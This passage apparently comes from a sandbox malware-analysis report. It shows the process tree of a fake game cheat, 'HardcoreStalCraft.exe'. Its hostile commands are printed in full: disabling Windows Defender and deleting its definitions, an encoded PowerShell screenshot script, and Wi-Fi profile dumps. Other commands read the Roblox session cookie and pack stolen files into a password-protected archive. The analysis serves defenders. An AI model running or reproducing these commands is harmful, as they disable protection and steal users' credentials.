  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4764 --field-trial-handle=1780,i,14519961761405529352,16323921618836889293,131072 /prefetch:8
  2⤵
  PID:96
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=3012 --field-trial-handle=1780,i,14519961761405529352,16323921618836889293,131072 /prefetch:1
  2⤵
  PID:3584
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=5616 --field-trial-handle=1780,i,14519961761405529352,16323921618836889293,131072 /prefetch:1
  2⤵
  PID:4420
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=4580 --field-trial-handle=1780,i,14519961761405529352,16323921618836889293,131072 /prefetch:1
  2⤵
  PID:4612
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4784 --field-trial-handle=1780,i,14519961761405529352,16323921618836889293,131072 /prefetch:8
  2⤵
  PID:4852
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5876 --field-trial-handle=1780,i,14519961761405529352,16323921618836889293,131072 /prefetch:8
  2⤵
  PID:4408
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=4512 --field-trial-handle=1780,i,14519961761405529352,16323921618836889293,131072 /prefetch:1
  2⤵
  PID:2148
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3068 --field-trial-handle=1780,i,14519961761405529352,16323921618836889293,131072 /prefetch:8
  2⤵
  PID:4092
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5732 --field-trial-handle=1780,i,14519961761405529352,16323921618836889293,131072 /prefetch:8
  2⤵
  PID:996
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5144 --field-trial-handle=1780,i,14519961761405529352,16323921618836889293,131072 /prefetch:8
  2⤵
  PID:4472
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4760 --field-trial-handle=1780,i,14519961761405529352,16323921618836889293,131072 /prefetch:8
  2⤵
  PID:5116
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6268 --field-trial-handle=1780,i,14519961761405529352,16323921618836889293,131072 /prefetch:8
  2⤵
  PID:4148

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:3160

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x3c8
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:220

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2444

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap27442:86:7zEvent4614
1⤵
- Suspicious use of FindShellTrayWindow
PID:2536

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\HardcoreHack\Инструкция.txt
1⤵
- Suspicious use of FindShellTrayWindow
PID:2672

C:\Users\Admin\Downloads\HardcoreHack\HardcoreStalCraft.exe
"C:\Users\Admin\Downloads\HardcoreHack\HardcoreStalCraft.exe"
1⤵
- Executes dropped EXE
PID:5072
- C:\Users\Admin\Downloads\HardcoreHack\HardcoreStalCraft.exe
  "C:\Users\Admin\Downloads\HardcoreHack\HardcoreStalCraft.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:3804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏‌ .scr'"
    3⤵
    PID:3300
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏‌ .scr'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    PID:2752
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4188
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:5972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\HardcoreHack\HardcoreStalCraft.exe'"
    3⤵
    PID:1556
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\HardcoreHack\HardcoreStalCraft.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4844
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:4952
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:5344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    PID:700
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:532
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:5400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:5144
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      PID:5516
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0yghkix4\0yghkix4.cmdline"
        5⤵
        
        PID:4984
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCA7F.tmp" "c:\Users\Admin\AppData\Local\Temp\0yghkix4\CSC8965F1DB57C14EE582A2E5276EFD6160.TMP"
        6⤵
        
        PID:5832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    PID:3152
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      PID:5388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3744
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1788
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:5352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5888
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5780
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5468
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:6020
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4012
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:6064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3032"
    3⤵
    PID:5480
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 3032
      4⤵
      Kills process with taskkill
      PID:5492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4196"
    3⤵
    PID:5760
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4196
      4⤵
      Kills process with taskkill
      PID:5048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:5260
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:700
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:6012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4960"
    3⤵
    PID:5788
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4960
      4⤵
      Kills process with taskkill
      PID:5296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2324"
    3⤵
    PID:5384
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2324
      4⤵
      Kills process with taskkill
      PID:5800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4452"
    3⤵
    PID:2060
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4452
      4⤵
      Kills process with taskkill
      PID:4584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4068"
    3⤵
    PID:4012
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4068
      4⤵
      Kills process with taskkill
      PID:6140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4524"
    3⤵
    PID:888
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4524
      4⤵
      Kills process with taskkill
      PID:6136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3320"
    3⤵
    PID:1252
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 3320
      4⤵
      Kills process with taskkill
      PID:2540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3120"
    3⤵
    PID:5000
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 3120
      4⤵
      Kills process with taskkill
      PID:1344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4612"
    3⤵
    PID:5376
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4612
      4⤵
      Kills process with taskkill
      PID:5044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2148"
    3⤵
    PID:3644
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2148
      4⤵
      Kills process with taskkill
      PID:5416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:5592
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2220
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI50722\rar.exe a -r -hp"topers" "C:\Users\Admin\AppData\Local\Temp\YPkPP.zip" *"
    3⤵
    PID:5720
  - - C:\Users\Admin\AppData\Local\Temp\_MEI50722\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI50722\rar.exe a -r -hp"topers" "C:\Users\Admin\AppData\Local\Temp\YPkPP.zip" *
      4⤵
      Executes dropped EXE
      PID:4596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:2184
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:4896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:3808
  - - C:\Windows\System32\Wbem\WMIC.exe
